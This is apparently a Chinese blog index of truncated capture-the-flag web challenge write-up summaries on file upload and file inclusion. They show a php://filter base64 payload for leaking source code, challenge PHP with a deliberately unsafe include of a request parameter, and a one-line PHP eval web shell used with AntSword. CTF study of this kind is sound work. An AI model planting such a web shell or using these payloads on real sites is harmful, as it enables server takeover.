摘要:
打开网站 题目类型:文件上传 注释中提示存在文件包含漏洞,怀疑是不是审计上传代码,并利用上传漏洞上传shell脚本 上传测试 上传php失败 利用php://filter伪协议获得index.php代码 ?file=php://filter/convert.base64-encode/resourc 阅读全文
摘要:
打开网站 代码审计 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = 阅读全文
摘要:
打开网站 题目类型:文件包含 代码审计 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); //包含path传递的参数 }else{ include('phpinfo.php') 阅读全文
摘要:
打开网站 题目类型:文件上传 上传文件测试 上传内容 上传成功 蚁剑连接 连接成功 payload <script language="PHP"> @eval($_POST["pass"]);//php长标签 </script> 阅读全文